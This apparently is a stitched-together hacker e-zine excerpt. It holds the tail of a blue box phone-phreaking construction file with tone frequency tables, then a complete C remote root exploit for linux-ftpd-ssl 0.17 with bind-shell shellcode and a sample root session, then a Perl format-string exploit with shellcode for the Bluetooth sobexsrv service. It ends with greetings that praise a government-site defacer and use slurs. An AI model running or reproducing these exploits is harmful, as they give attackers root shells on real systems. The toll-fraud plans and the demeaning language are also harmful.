3 A |----Y1=8 X1=3 | 4 5 6 B | | 5 6 7 8 | | 4 5 6 B |----Y2=1 X2=5 | 7 8 9 C | | 9 10 11 12 | | 7 8 9 C |----Y3=2 X3=6 | * 0 # D | | 13 14 15 16 | | * 0 # D |----Y4=4 X4=7 +---------+ +-------------+ +------------+ | | | | X1 X2 X3 X4 +----------------------+ | Blue Box Frequencies | +----------------------+ This section is taken directly from Mark Tabas's "Better Homes and Blue Boxing" file Part 1. Frequenies (Hz) Domestic Int'l ---------------------------------- 700+900 1 1 700+1100 2 2 900+1100 3 3 700+1300 4 4 900+1300 5 5 1100+1300 6 6 700+1500 7 7 900+1500 8 8 1100+1500 9 9 1300+1500 0 0 700+1700 ST3p Code 11 900+1700 STp Code 12 1100+1700 KP KP1 1300+1700 ST2p KP2 1500+1700 ST ST 2600+3700 *Trunking Frequency* Note: For any further information about the uses or duration of the frequencies, read the Mark Tabas files. +----------------+ | Schematic Help | +----------------+ This is the Key to the diagrams in the schematic. I hope that they help more then they might hurt. _|_ X_/GND is the Ground symbol | | ---| |-- is the Capacitor symbol | | (.1C) stands for a .1 uf Capacitor (.01C) stands for a .01 uf Capacitor | ----- ----- is another Capacitor symbol | --X/XRx/X/-- is the Resistor symbol (The 1.5K Ohm and 1.0K Ohm Resistors are at +/- 5% ) ---+ | X/X/X/X/-- is the Potentiometer symbol (The frequncies I supplied above are just examples.) --|>o-- is the Inverter symbol +------------+ | Conclusion | +------------+ This is just one way to build a Blue Box. If you choose this way, then I hope this file is adequate enough to aid you in the construction. Although these are not the best plans, they do work. This file does not tell you how to use it or what to do once it's built. For that information I mention that you read Mark Tabas's "Better Homes and Blue Boxing" files, or any other files/BBS subboards that deal with that realm. If you need help, I sluggest (thanks for that one Taran) that you ask a close friend, possibly an electronics teacher, or a phreak friend to help you. Also, if you need help or have questions or comments about this file, you can address them to me. I can be contacted through the LOD/H Technical Journal Staff account on the boards listed in the Intro, or on the few boards I call. +-------------+ ! Credentials ! +-------------+ At last, this article would not be possible without the help of the following people/places whom contributed to it in one way or another (it may not be apparent to them, but every minute bit helps). Deserted Surfer (Who helped immensly from Day 1 of this project.) (Without his help this file would not be.) Mark Tabas (For the BHBB files which inspired my interests.) Nickie Halflinger (For the original Blue Box plans I used.) Mr. America (For the original Blue Box plans I used.) Lex Luthor Cheap Shades Exar Corp. Lastly, I would like to thank the United States government for furnishing federal grants to this project. Without their financial help, I would have had to dish out the money from my own pocket (Approximately $80.00. Egads!) ************************************************************************************ linux-ftpd-ssl 0.17 (MKD/CWD) Remote Root Exploit -by dumb0 /* connecting to 192.168.2.9:21... ok. OK - STARTING ATTACK +++ USING STACK ADDRESS 0xbfffcc03 +++ +++ USING STACK ADDRESS 0xbfffcc13 +++ +++ USING STACK ADDRESS 0xbfffcc23 +++ +++ USING STACK ADDRESS 0xbfffcc33 +++ +++ USING STACK ADDRESS 0xbfffcc43 +++ +++ USING STACK ADDRESS 0xbfffcc53 +++ +++ USING STACK ADDRESS 0xbfffcc63 +++ +++ USING STACK ADDRESS 0xbfffcc73 +++ +++ USING STACK ADDRESS 0xbfffcc83 +++ +++ USING STACK ADDRESS 0xbfffcc93 +++ +++ USING STACK ADDRESS 0xbfffcca3 +++ +++ USING STACK ADDRESS 0xbfffccb3 +++ +++ USING STACK ADDRESS 0xbfffccc3 +++ +++ USING STACK ADDRESS 0xbfffccd3 +++ +++ USING STACK ADDRESS 0xbfffcce3 +++ +++ USING STACK ADDRESS 0xbfffccf3 +++ +++ USING STACK ADDRESS 0xbfffcd03 +++ +++ USING STACK ADDRESS 0xbfffcd13 +++ +++ USING STACK ADDRESS 0xbfffcd23 +++ +++ USING STACK ADDRESS 0xbfffcd33 +++ +++ USING STACK ADDRESS 0xbfffcd43 +++ +++ USING STACK ADDRESS 0xbfffcd53 +++ +++ USING STACK ADDRESS 0xbfffcd63 +++ +++ USING STACK ADDRESS 0xbfffcd73 +++ +++ USING STACK ADDRESS 0xbfffcd83 +++ +++ USING STACK ADDRESS 0xbfffcd93 +++ +++ USING STACK ADDRESS 0xbfffcda3 +++ +++ USING STACK ADDRESS 0xbfffcdb3 +++ +++ USING STACK ADDRESS 0xbfffcdc3 +++ +++ USING STACK ADDRESS 0xbfffcdd3 +++ +++ USING STACK ADDRESS 0xbfffcde3 +++ +++ USING STACK ADDRESS 0xbfffcdf3 +++ +++ USING STACK ADDRESS 0xbfffce03 +++ +++ USING STACK ADDRESS 0xbfffce13 +++ +++ USING STACK ADDRESS 0xbfffce23 +++ +++ USING STACK ADDRESS 0xbfffce33 +++ +++ USING STACK ADDRESS 0xbfffce43 +++ +++ USING STACK ADDRESS 0xbfffce53 +++ +++ USING STACK ADDRESS 0xbfffce63 +++ +++ USING STACK ADDRESS 0xbfffce73 +++ +++ USING STACK ADDRESS 0xbfffce83 +++ +++ USING STACK ADDRESS 0xbfffce93 +++ +++ USING STACK ADDRESS 0xbfffcea3 +++ +++ USING STACK ADDRESS 0xbfffceb3 +++ +++ USING STACK ADDRESS 0xbfffcec3 +++ id uid=0(root) gid=0(root) egid=1000(dumb0) groups=1000(dumb0),20(dialout),24(cdrom ),25(floppy),29(audio),44(video),46(plugdev) uname -a Linux debian 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux // Tested on Linux 2.4.18-14 Redhat 8.0 // Linux 2.2.20-idepci Debian GNU 3.0 // Linux 2.4.27-2-386 Debian GNU 3.1 */ #include #include #include #include #include #include #include #include #include #include #include #define BUF_SIZ 4096 #define PORT 21 #define BINDPORT 30464 #define STACK_START 0xbfffcc03 #define STACK_END 0xbffff4f0 /*my shellcode*/ /*setreuid,chroot break, bind to port 30464, 0xff is double*/ unsigned char lnx_bind[] = "\x90\x90\x90\x90\x90\x90\x90\x90" "\xEB\x70\x31\xC0\x31\xDB\x31\xC9" "\xB0\x46\xCD\x80\x5E\x90\xB8\xBE" "\xff\xff\xff\xff\xff\xff\xF7\xD0" "\x89\x06\xB0\x27\x8D\x1E\xFE\xC5" "\xB1\xED\xCD\x80\x31\xC0\x8D\x1E" "\xB0\x3D\xCD\x80\x66\xB9\xff\xff" "\x03\xBB\xD2\xD1\xD0\xff\xff\xF7" "\xDB\x89\x1E\x8D\x1E\xB0\x0C\xCD" "\x80\xE2\xEF\xB8\xD1\xff\xff\xff" "\xff\xff\xff\xF7\xD0\x89\x06\xB0" "\x3D\x8D\x1E\xCD\x80\x31\xC0\x31" "\xDB\x89\xF1\xB0\x02\x89\x06\xB0" "\x01\x89\x46\x04\xB0\x06\x89\x46" "\x08\xB0\x66\x43\xCD\x80\x89\xF1" "\x89\x06\xB0\x02\x66\x89\x46\x0C" "\xEB\x04\xEB\x74\xEB\x77\xB0\x77" "\x66\x89\x46\x0E\x8D\x46\x0C\x89" "\x46\x04\x31\xC0\x89\x46\x10\xB0" "\x10\x89\x46\x08\xB0\x66\x43\xCD" "\x80\xB0\x01\x89\x46\x04\xB0\x66" "\xB3\x04\xCD\x80\x31\xC0\x89\x46" "\x04\x89\x46\x08\xB0\x66\xB3\x05" "\xCD\x80\x88\xC3\xB0\x3F\x31\xC9" "\xCD\x80\xB0\x3F\xB1\x01\xCD\x80" "\xB0\x3F\xB1\x02\xCD\x80\xB8\xD0" "\x9D\x96\x91\xF7\xD0\x89\x06\xB8" "\xD0\x8C\x97\xD0\xF7\xD0\x89\x46" "\x04\x31\xC0\x88\x46\x07\x89\x76" "\x08\x89\x46\x0C\xB0\x0B\x89\xF3" "\x8D\x4E\x08\x8D\x56\x0C\xCD\x80" "\xE8\x15\xff\xff\xff\xff\xff\xff"; long ficken() { printf("lnxFTPDssl_warez.c\nlinux-ftpd-ssl 0.17 remote r00t exploit by dumb0\n\n"); return 0xc0debabe; } void usage(char **argv) { printf("Insufficient parameters given.\n"); printf("Usage: %s [writeable directory]\n", argv[0]); exit(0); } void _recv(int sock, char *buf) { int bytes=recv(sock, buf, BUFSIZ, 0); if (bytes < 0) { perror("read() failed"); exit(1); } } void attack(int sock, unsigned long ret, char *pad) { int i,k; char *x=(char*)malloc(1024); char *bufm=(char*)malloc(1024); char *bufc=(char*)malloc(1024); char *rbuf=(char*)malloc(BUFSIZ+10); char *nops=(char*)malloc(1024); unsigned char a,b,c,d; memset(nops,0,1024); memset(nops,0x90,255); memset(x,0,1024); for (i=0,k=0;i<60;i++) { a=(ret >> 24) & 0xff; b=(ret >> 16) & 0xff; c=(ret >> 8) & 0xff; d=(ret) & 0xff; if (d==255) { x[k]=d; x[++k]=255; } else { x[k]=d; } if (c==255) { x[k+1]=c; x[++k+1]=255; } else { x[k+1]=c; } if (b==255) { x[k+2]=b; x[++k+2]=255; } else { x[k+2]=b; } if (a==255) { x[k+3]=a; x[++k+3]=255; } else { x[k+3]=a; } k+=4; } snprintf(bufm, 1000, "MKD %s%s\r\n", pad, x); // 1x'A' redhat 8.0 / 2x'A' debian gnu 3.0 / 3x'A' debian gnu 3.1 snprintf(bufc, 1000, "CWD %s%s\r\n", pad, x); for (i=0; i<11; i++) { send(sock, bufm, strlen(bufm), 0); recv(sock, rbuf, BUFSIZ, 0); send(sock, bufc, strlen(bufc), 0); recv(sock, rbuf, BUFSIZ, 0); } for (i=0; i<2; i++) { snprintf(bufm, 1000, "MKD %s\r\n", lnx_bind); snprintf(bufc, 1000, "CWD %s\r\n", lnx_bind); send(sock, bufm, strlen(bufm), 0); recv(sock, rbuf, BUFSIZ, 0); send(sock, bufc, strlen(bufc), 0); recv(sock, rbuf, BUFSIZ, 0); snprintf(bufm, 1000, "MKD %s\r\n", nops); snprintf(bufc, 1000, "CWD %s\r\n", nops); send(sock, bufm, strlen(bufm), 0); recv(sock, rbuf, BUFSIZ, 0); send(sock, bufc, strlen(bufc), 0); recv(sock, rbuf, BUFSIZ, 0); } send(sock, "XPWD\r\n", strlen("XPWD\r\n"), 0); free(bufm); free(bufc); free(x); free(rbuf); } int do_remote_shell(int sockfd) { while(1) { fd_set fds; FD_ZERO(&fds); FD_SET(0,&fds); FD_SET(sockfd,&fds); if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)) { int cnt; char buf[1024]; if(FD_ISSET(0,&fds)) { if((cnt=read(0,buf,1024))<1) { if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else break; } write(sockfd,buf,cnt); } if(FD_ISSET(sockfd,&fds)) { if((cnt=read(sockfd,buf,1024))<1) { if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else break; } write(1,buf,cnt); } } } } int do_connect (char *remotehost, int port) { struct hostent *host; struct sockaddr_in addr; int s; if (!inet_aton(remotehost, &addr.sin_addr)) { host = gethostbyname(remotehost); if (!host) { perror("gethostbyname() failed"); return -1; } addr.sin_addr = *(struct in_addr*)host->h_addr; } s = socket(PF_INET, SOCK_STREAM, 0); if (s == -1) { perror("socket() failed"); return -1; } addr.sin_port = htons(port); addr.sin_family = AF_INET; if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1) { if (port == PORT) perror("connect() failed"); return -1; } return s; } void do_login(int s, char *buf, char *sendbuf, char *user, char *pass) { memset(buf, 0, sizeof(buf)); memset(sendbuf, 0, sizeof(sendbuf)); do { _recv(s, buf); } while (strstr(buf, "220 ") == NULL); snprintf(sendbuf, BUFSIZ, "USER %s\r\n", user); send(s, sendbuf, strlen(sendbuf), 0); do { _recv(s, buf); } while (strstr(buf, "331 ") == NULL); snprintf(sendbuf, BUFSIZ, "PASS %s\r\n", pass); send(s, sendbuf, strlen(sendbuf), 0); do { _recv(s, buf); } while (strstr(buf, "230 ") == NULL); } int main(int argc, char **argv) { char remotehost[255]; char user[255]; char pass[255]; char pad[10]; char *buf,*sendbuf; int stackaddr=STACK_START; int s,sr00t,i; ficken(); if (argc < 4) usage(argv); strncpy(remotehost, argv[1], sizeof(remotehost)); remotehost[sizeof(remotehost)-1]=0; strncpy(user, argv[2], sizeof(user)); user[sizeof(user)-1]=0; strncpy(pass, argv[3], sizeof(pass)); pass[sizeof(pass)-1]=0; printf("connecting to %s:%d...", remotehost, PORT); fflush(stdout); s=do_connect(remotehost, PORT); puts(" ok."); buf=(char*)malloc(BUFSIZ+10); sendbuf=(char*)malloc(BUFSIZ+10); do_login(s, buf, sendbuf, user, pass); if (strstr(buf, "230")!=NULL) { printf("OK - STARTING ATTACK\n"); i=0; while (stackaddr <= STACK_END) { printf("+++ USING STACK ADDRESS 0x%.08x +++\n", stackaddr); sleep(1); if (i==1) { strcpy(pad, "A"); } if (i==2) { strcpy(pad, "AA"); } if (i==3) { strcpy(pad, "AAA"); i=0; } attack(s, stackaddr, pad); close(s); s=do_connect(remotehost, PORT); do_login(s, buf, sendbuf, user, pass); if (argv[4] != NULL) { snprintf(sendbuf, BUFSIZ, "CWD %s\r\n", argv[4]); send(s, sendbuf, strlen(sendbuf), 0); recv(s, buf, BUFSIZ, 0); } if((sr00t=do_connect(remotehost, BINDPORT)) > 0) { /* XXX Remote r00t */ printf("\nLet's get ready to rumble!\n"); do_remote_shell(sr00t); exit(0); } stackaddr+=16; i++; } } else { printf("\nLogin incorrect\n"); exit(1); } free(buf); free(sendbuf); return 0; } ********************************************************************************************** #!/usr/bin/perl # # trifinite.group Bluetooth sobexsrv remote syslog() exploit # code by kf_lists[at]digitalmunition[dot]com # # http://www.cdej.org $retloc = 0x8053418; # Due to unicode the filename is NOT usable. Must use file contents. # R_386_JUMP_SLOT exit() $addy = "\x5a\x19\x05\x08"; $addy2 = "\x58\x19\x05\x08"; $lo = ($retloc >> 0) & 0xffff; $hi = ($retloc >> 16) & 0xffff; $hi = $hi - 0x38; $lo = (0x10000 + $lo) - $hi - 0x38; #print "hi: $hi\n"; #print "lo: $lo\n"; $string = "./ussp-push 00:0B:0D:63:0B:CC\@1 /tmp/shellcode " . "$addy$addy2%$hi.d%27\\\$hn%$lo.d%28\\\$hn" . "\x41" x 200; #print $string . "\n"; $sc = "\x90" x 31 . # Metasploit /usr/bin/id shellcode "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4c\x46\x4b\x50\x4a\x35". "\x49\x39\x44\x55\x48\x46\x4a\x46\x4d\x52\x43\x36\x49\x58\x47\x4e". "\x4a\x56\x4f\x52\x43\x57\x4a\x46\x42\x50\x4a\x56\x4f\x32\x44\x56". "\x49\x46\x50\x56\x49\x58\x43\x4e\x44\x45\x4a\x4e\x4e\x30\x42\x30". "\x42\x30\x42\x50\x4f\x32\x45\x47\x43\x57\x44\x47\x4f\x32\x44\x56". "\x49\x36\x50\x46\x4f\x52\x49\x56\x46\x36\x42\x50\x47\x45\x43\x35". "\x49\x58\x41\x4e\x4d\x4c\x42\x38\x5a"; open(F, "> /tmp/shellcode") or die "can't open file"; print F "$sc\n"; close(F); system($string); ******************************************************************************************************* On the behalf on the elite CDEJ staff i'd like to thank the following figures for making this possible: Longarm: our beloved monkey chief <:D> trans: 5 stars general trans :D? highest member in ranking so far :D? you outdone yourself again little brother, :.) hunt3rx: mysterious spy/fed :? brought us l0lz n ports when the CDEJ staff was out on field trips in m*slim (spit) territories, and our usual gay day jobs. Thank you hunt3rx _Padre_ : recounced .gov defacer with pure moral intentions: lebx0r is gay ditch it! migzy: channel operator who actively brought undernet infestors onto efnet. thank you for ruining what is left of a decent IRC >:D< *******************************************************************************************************